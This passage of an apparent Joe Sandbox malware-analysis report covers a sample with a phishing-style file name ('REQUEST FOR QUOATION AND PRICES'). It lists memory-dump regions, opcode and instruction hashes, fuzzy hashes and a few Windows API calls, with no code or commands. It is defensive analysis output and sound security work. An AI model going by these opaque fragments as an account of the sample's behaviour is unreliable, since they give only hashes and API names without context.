                                                                                                                                  • Instruction Fuzzy Hash: 421125B58002498FCB50DFA9C444BDEBFF4AB48310F248459D519A3200C778A945CFA2
                                                                                                                                  APIs
                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 383CD445
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320989243.00000000383C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 383C0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_383c0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Initialize
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2538663250-0
                                                                                                                                  • Opcode ID: 3198084b64449b87a1e99aa94e0f61db3960a16271e8cf84cef61c9f5b9baf38
                                                                                                                                  • Instruction ID: 85876e145caec9ba4501366e04f337a28bc7a2730757207c0869e92e819d1dd9
                                                                                                                                  • Opcode Fuzzy Hash: 3198084b64449b87a1e99aa94e0f61db3960a16271e8cf84cef61c9f5b9baf38
                                                                                                                                  • Instruction Fuzzy Hash: C81145B59003488FCB50DFAAC544BEEFBF4EB48324F10845AE618A7300C778A980CFA5
                                                                                                                                  APIs
                                                                                                                                  • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,383CD92F), ref: 383CE765
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320989243.00000000383C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 383C0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_383c0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DispatchMessage
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2061451462-0
                                                                                                                                  • Opcode ID: e69824dce8d53be8d3bbc88aca322006824121d7a2edf8099e758518652c78fa
                                                                                                                                  • Instruction ID: bee13f4a1956162cba27ef56b88d4a205f9643a8c099bd6622878544c17ddac3
                                                                                                                                  • Opcode Fuzzy Hash: e69824dce8d53be8d3bbc88aca322006824121d7a2edf8099e758518652c78fa
                                                                                                                                  • Instruction Fuzzy Hash: 9C11EDB5D047499FDB10DFAAD584A9EFBF8EB48324F10846AE518A3310D378A944CFA5
                                                                                                                                  APIs
                                                                                                                                  • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,383CD92F), ref: 383CE765
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320989243.00000000383C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 383C0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_383c0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DispatchMessage
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2061451462-0
                                                                                                                                  • Opcode ID: 05b2b5ac378ecfee740472d06ab895ca4848ac3d85eb743e41e9871c88b2be3a
                                                                                                                                  • Instruction ID: d5b7c2ee1bb68da9d2c435ec0f503c3eab19f769a0d653ef1d5fa45d89a12547
                                                                                                                                  • Opcode Fuzzy Hash: 05b2b5ac378ecfee740472d06ab895ca4848ac3d85eb743e41e9871c88b2be3a
                                                                                                                                  • Instruction Fuzzy Hash: C111E0B5C046499FCB10DFAAD945BDEFBF4EB48314F10842AD558A7240D378A544CFA6
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320989243.00000000383C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 383C0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_383c0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Timer
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2870079774-0
                                                                                                                                  • Opcode ID: e5c6a7d110782618b15e77826685725c17318ab3e95a6ab3651220d7fe28f692
                                                                                                                                  • Instruction ID: 6cd111b30cc40a99381a1b1be8ebb590e457723cad443eb8d0408a9b31164f39
                                                                                                                                  • Opcode Fuzzy Hash: e5c6a7d110782618b15e77826685725c17318ab3e95a6ab3651220d7fe28f692
                                                                                                                                  • Instruction Fuzzy Hash: F611D3B58003499FDB10DFAAD545BDEFBF8EB48320F10841AE558A7310C379A994CFA1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: LR]q
                                                                                                                                  • API String ID: 0-3081347316
                                                                                                                                  • Opcode ID: 41c7040dd66b1d38b22a94f9f511f12045eff5fff288d5ba0acc9da1cf425c1d
                                                                                                                                  • Instruction ID: 8bb0ad15de273ffad6741f253b33b7756892c4c68f8086cd0cccf5714b438748
                                                                                                                                  • Opcode Fuzzy Hash: 41c7040dd66b1d38b22a94f9f511f12045eff5fff288d5ba0acc9da1cf425c1d
                                                                                                                                  • Instruction Fuzzy Hash: 53A1D874A5020ACFCF08DFA8E985A9DBBB5FF49301B144529D405AB3A5DF34AD46CF90
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: LR]q
                                                                                                                                  • API String ID: 0-3081347316
                                                                                                                                  • Opcode ID: f5d9a1ac541f7973c02c649546077564cc3fc4080f9558d40e781a704d420c57
                                                                                                                                  • Instruction ID: fb420bbdc093903aab2aa7a198f8270087e52ad7dfd0db2d4710912c19304a5d
                                                                                                                                  • Opcode Fuzzy Hash: f5d9a1ac541f7973c02c649546077564cc3fc4080f9558d40e781a704d420c57
                                                                                                                                  • Instruction Fuzzy Hash: 73A1A874A5020ACFCF08DFA8E985A9DBBB6FF48301B144529D405AB3A5DF34AD46CF90
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: (o]q
                                                                                                                                  • API String ID: 0-794736227
                                                                                                                                  • Opcode ID: 348aa4133ca93157d1407fa24e559d96bfa700ee15c16738aadd542198d8fe71
                                                                                                                                  • Instruction ID: 3a857f0713f8a7d7d9a860eafa5c4a543796406359341b49ec16dc4693133942
                                                                                                                                  • Opcode Fuzzy Hash: 348aa4133ca93157d1407fa24e559d96bfa700ee15c16738aadd542198d8fe71
                                                                                                                                  • Instruction Fuzzy Hash: A8411131B042048FCB149F69D854AAEBBF6AFCC710F14446AE906D77A1CE319D06CBA1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4']q
                                                                                                                                  • API String ID: 0-1259897404
                                                                                                                                  • Opcode ID: 4e8e1f1249ff46453c3f1944c2c8ef040b4c5e474eb5d06c03e02554a4ed00cb
                                                                                                                                  • Instruction ID: 17d12277d5f916b78f212027d12731b67bc49717cfb7801ec1c7e5c835db3d14
                                                                                                                                  • Opcode Fuzzy Hash: 4e8e1f1249ff46453c3f1944c2c8ef040b4c5e474eb5d06c03e02554a4ed00cb
                                                                                                                                  • Instruction Fuzzy Hash: 5F31A430A093489FD715EFB8D4106ADBBB2FF86304F0085AAD4545B3A6DB749905CF52
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: dcd894003d4db6e81cbc7b1a538d17462741ceb48468fd5848856fddd6e115f4
                                                                                                                                  • Instruction ID: b5b7b883cceaba2afc70e8fc4751a1b24a6457c35fd26c172113e5037ac2afed
                                                                                                                                  • Opcode Fuzzy Hash: dcd894003d4db6e81cbc7b1a538d17462741ceb48468fd5848856fddd6e115f4
                                                                                                                                  • Instruction Fuzzy Hash: 1BE10274A00219CFDB24DF60D944BADBBB6FB89301F1084AAD809773A5DB359E86CF54
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 8136565f114c776404fd9d8257ea8db1e77e658d65495e5cccd70ebf21e59656
                                                                                                                                  • Instruction ID: 033ae86dc01cb4327e09d25a09d5de7d2c287cb91137eff1d51f4fb146b946d0
                                                                                                                                  • Opcode Fuzzy Hash: 8136565f114c776404fd9d8257ea8db1e77e658d65495e5cccd70ebf21e59656
                                                                                                                                  • Instruction Fuzzy Hash: 9CE10274A00219CFDB24DF60D944BADBBB6FB89301F1084AAD809773A5DB359E86CF54
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 5cfa0f2de6d1163bac188b75b4c2358f10665e1fff1d169ccfb8d0feb3d97026
                                                                                                                                  • Instruction ID: 98e973554d542a2fddf197085849b596d8d8eb866e8198da99bde79c3e2252fc
                                                                                                                                  • Opcode Fuzzy Hash: 5cfa0f2de6d1163bac188b75b4c2358f10665e1fff1d169ccfb8d0feb3d97026
                                                                                                                                  • Instruction Fuzzy Hash: 8771FA347003058FCB65DF29C894A6E7BE6AF59740B1544ABE805CB3B1DB76EC41CBA1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6c9aec83598c73332892980b60237ffc08e02dffb3354ca0527a0461e3d2e41c
                                                                                                                                  • Instruction ID: b2816c549ade6954a5e078ec1fd3cf22ce328bd1df33a53c212254996624b7c0
                                                                                                                                  • Opcode Fuzzy Hash: 6c9aec83598c73332892980b60237ffc08e02dffb3354ca0527a0461e3d2e41c
                                                                                                                                  • Instruction Fuzzy Hash: BA710775A00269DFDF15DFB5C8999ADBFB2FF88310F14852AE406AB250DB389942CF41
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 8b82de129e6a3fbef3af338fa4ebeca85f2f05671e1259a3d079dc520411c4a0
                                                                                                                                  • Instruction ID: 953f0fe81a2e28613c9d82a99d8f238a411e44837c9b66dbb93ba9c8ca48a910
                                                                                                                                  • Opcode Fuzzy Hash: 8b82de129e6a3fbef3af338fa4ebeca85f2f05671e1259a3d079dc520411c4a0
                                                                                                                                  • Instruction Fuzzy Hash: D9617A74A40219CFDB15CF60D944BADBBBAFF88300F1088AA980A733A5DB355D82DF44
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 80f30b6970095c4b25dab0d4b6b62d508d48cf913e8b063c76fa7d3f99e1eafa
                                                                                                                                  • Instruction ID: 666f92fbefd48392fba9261f89b7b6e792ede1d09af6ec4b913bdf2c0fceb602
                                                                                                                                  • Opcode Fuzzy Hash: 80f30b6970095c4b25dab0d4b6b62d508d48cf913e8b063c76fa7d3f99e1eafa
                                                                                                                                  • Instruction Fuzzy Hash: 1F512274D00318CFDB14CFA1D944AEEBBB2FF88310F208529E809AB255DB345A4ACF41
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 73d88ed9c1b148f1cf0489a2c3eaf26a24d5326583e4cec7e835566081fa43be
                                                                                                                                  • Instruction ID: 91c374d06390cfa30e409aec9080fedca2f63e54b2d4d3a0d2451364e27c697b
                                                                                                                                  • Opcode Fuzzy Hash: 73d88ed9c1b148f1cf0489a2c3eaf26a24d5326583e4cec7e835566081fa43be
                                                                                                                                  • Instruction Fuzzy Hash: 5B51BF74E00218DFDB54DFA9D990ADDBBB2FF88300F248569D809AB365DB31A946CF40
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 912ae50181549efa643bfc4215beb433118dcd6236e6530f2b74127c579a6364
                                                                                                                                  • Instruction ID: 67eb8404d43fa9b0091d43fd467e93a9be690b87963e0e558b69a1aa276b6064
                                                                                                                                  • Opcode Fuzzy Hash: 912ae50181549efa643bfc4215beb433118dcd6236e6530f2b74127c579a6364
                                                                                                                                  • Instruction Fuzzy Hash: 93519174E11308DFCB08DFA9D58499DBBB2FF89300B248469E809BB365DB35A942CF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d4ab1c289826fe78dc2a36593c4567f035b8b2d2a9b06813456e986f0674c902
                                                                                                                                  • Instruction ID: 525909cedb4885edbe70de07537536e5952ed6cf5e0d082c86dcc4d4a6e1f673
                                                                                                                                  • Opcode Fuzzy Hash: d4ab1c289826fe78dc2a36593c4567f035b8b2d2a9b06813456e986f0674c902
                                                                                                                                  • Instruction Fuzzy Hash: 4351CD74E02228CFDB64DF64D984BEDBBB2BB49311F1451AAD409A7350DB35AE82CF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b69520ace21d7df737be0a1a0a40a3542454366e8527a5ade6611aa4d1168a3b
                                                                                                                                  • Instruction ID: 44f294dd82b49bb74c97ff3d902665cbd5fd09e651fee466293b2f85346e88f3
                                                                                                                                  • Opcode Fuzzy Hash: b69520ace21d7df737be0a1a0a40a3542454366e8527a5ade6611aa4d1168a3b
                                                                                                                                  • Instruction Fuzzy Hash: 41417F31A04349DFCF15CFA4D884AEDBBF2AF49310F048156E915AB3A2D371E955DBA0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 15fffec8b8591b897854cbcb54c9175d074af9a46b2bd523802ee2288d13ad75
                                                                                                                                  • Instruction ID: 76330e7b6523d11c105f6191fe224af4354c4193f41f0ae4819d73205922926b
                                                                                                                                  • Opcode Fuzzy Hash: 15fffec8b8591b897854cbcb54c9175d074af9a46b2bd523802ee2288d13ad75
                                                                                                                                  • Instruction Fuzzy Hash: 08316830612245CFDB10CB18C844BAEBBE6EF88300F14C466EA05CB366DB71DD419BB5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ae6361c4cd4cb5570360bff548ecb9bac2f49324d99972299c32b5d33644b0dd
                                                                                                                                  • Instruction ID: 0b652d9182453fb2d16d9b653779918526db1ff7ccc0de6157e3aacdf75e2476
                                                                                                                                  • Opcode Fuzzy Hash: ae6361c4cd4cb5570360bff548ecb9bac2f49324d99972299c32b5d33644b0dd
                                                                                                                                  • Instruction Fuzzy Hash: 283194316082099FCF059F64E955AAE3BA2FF89300F10402AF9169B395CF35DE61DBB1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 4f3dbccd95c5e40697c353c4d92dc88e422990cb22ac8523e2ad1e2d9ef8c7e9
                                                                                                                                  • Instruction ID: e0ffbed4ffd4294ee70b3c9d214ced02121df76b1484dc89a93af9e021d44da5
                                                                                                                                  • Opcode Fuzzy Hash: 4f3dbccd95c5e40697c353c4d92dc88e422990cb22ac8523e2ad1e2d9ef8c7e9
                                                                                                                                  • Instruction Fuzzy Hash: C7314834C10219DEDB10EFE8D8186EDBBB0FF4B301F40A516E44877220EB306A9ACB50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 7b8b708588abf32bd3513938ead6b3d8ba3c3fd147b49a2f8a5cbfbb7f783f12
                                                                                                                                  • Instruction ID: 12f572f008cebfc8b14ae59ba1d75ce285d373d3f07dab8eaa9946d1b19b40ba
                                                                                                                                  • Opcode Fuzzy Hash: 7b8b708588abf32bd3513938ead6b3d8ba3c3fd147b49a2f8a5cbfbb7f783f12
                                                                                                                                  • Instruction Fuzzy Hash: 1131A474A003068BDF28CF6AD5906AEFBF69F88760F10842DD446B7654DB35E90ACB71
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 1068af26d9e96aed31b42625563a750d1b82e2a4dcd474f8eb8dc11dabcb9c11
                                                                                                                                  • Instruction ID: a246e669cd207f5dd5137c4b266eed1bb13a91b52e1f1ee557707ee19210087b
                                                                                                                                  • Opcode Fuzzy Hash: 1068af26d9e96aed31b42625563a750d1b82e2a4dcd474f8eb8dc11dabcb9c11
                                                                                                                                  • Instruction Fuzzy Hash: 5B2190313083058BDB25572A989477E3A97AFD4758F14843BD50ACB7D4EA7ACC4293A1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 352e5797e403fe0de96c95e7cbc04c68fbba4116a6163bdbbdc96ae27e04e35a
                                                                                                                                  • Instruction ID: 68cc52d50fb48217f858b89de997d0a84ea6f97b90b7d3535c1377feca512e9b
                                                                                                                                  • Opcode Fuzzy Hash: 352e5797e403fe0de96c95e7cbc04c68fbba4116a6163bdbbdc96ae27e04e35a
                                                                                                                                  • Instruction Fuzzy Hash: 9D21F875A002018BDF28CB7AD5A06FEFBF29F88360F14852DD446B7654DB35A90ACB61
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3320816177.0000000037D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37D50000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_37d50000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 4548d7a433cc900a61131775fd147d9901ab456bfdb82b7c7edaade23ebd1fbf
                                                                                                                                  • Instruction ID: 82c5f2f53ce8c967aea61539ab814e2e27555eb7a04a29348f1d62d7c1843ff8
                                                                                                                                  • Opcode Fuzzy Hash: 4548d7a433cc900a61131775fd147d9901ab456bfdb82b7c7edaade23ebd1fbf
                                                                                                                                  • Instruction Fuzzy Hash: 06314979A00319CBDF19DF75C4586ADBBF2AF88350F14852AD40AAB390DF389842CF52
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 95316f22867ae84df7bedfaf2e08badacfbef5cdbf81d95d4278649ef68c7c64
                                                                                                                                  • Instruction ID: bd12789d8aed10ea39fafb17b178de59679632abee21bd67d78f0c9f54624f58
                                                                                                                                  • Opcode Fuzzy Hash: 95316f22867ae84df7bedfaf2e08badacfbef5cdbf81d95d4278649ef68c7c64
                                                                                                                                  • Instruction Fuzzy Hash: C6219035A00206AFCB54DF64C4609EE77A5EB99364B14C01AD81D9B340EF35EE0ACBE2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 8a8a71bac800f653d16e3669654f78011ea9531de19e1f85b2a68e96f3afdfdf
                                                                                                                                  • Instruction ID: 0217c15159131a68d6b771851c6d52a9223a0313f9345be8ff816ff65db4ef0b
                                                                                                                                  • Opcode Fuzzy Hash: 8a8a71bac800f653d16e3669654f78011ea9531de19e1f85b2a68e96f3afdfdf
                                                                                                                                  • Instruction Fuzzy Hash: 5131F7B4E0530ADFCB50DFA8D580AADBBF0AF49310F1084AAE455AB361D7349E44DB91
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292600254.000000000009D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0009D000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_9d000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 3220879c76a21ddf13d3b472bde57507744cde5212eda1158be1a3f220093df2
                                                                                                                                  • Instruction ID: eb366fdcea03d5cba9eaff42db8226322de1d3cec4af3de1d771074ba3f519f2
                                                                                                                                  • Opcode Fuzzy Hash: 3220879c76a21ddf13d3b472bde57507744cde5212eda1158be1a3f220093df2
                                                                                                                                  • Instruction Fuzzy Hash: 89214571180204DFCF15DF14C9C0F2ABFA5FB98318F20C16AE9090B216C33AD846EBA2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000004.00000002.3292800025.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_4_2_d0000_REQUEST FOR QUOATION AND PRICES 0910775_pdf.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 3ab06dd4b893abccf991e3776950af921411612de8c3ccca35e38dc876996079
                                                                                                                                  • Instruction ID: 752497fab983c139b269f06536767e71fc635c3f932ebb92c2a859c0a958b27a
                                                                                                                                  • Opcode Fuzzy Hash: 3ab06dd4b893abccf991e3776950af921411612de8c3ccca35e38dc876996079
                                                                                                                                  • Instruction Fuzzy Hash: A421C031304A118FCB299B29D89492EB792BF85792715413AE80ADB794CF70DD028BE0
                                                                                                                                  Memory Dump Source
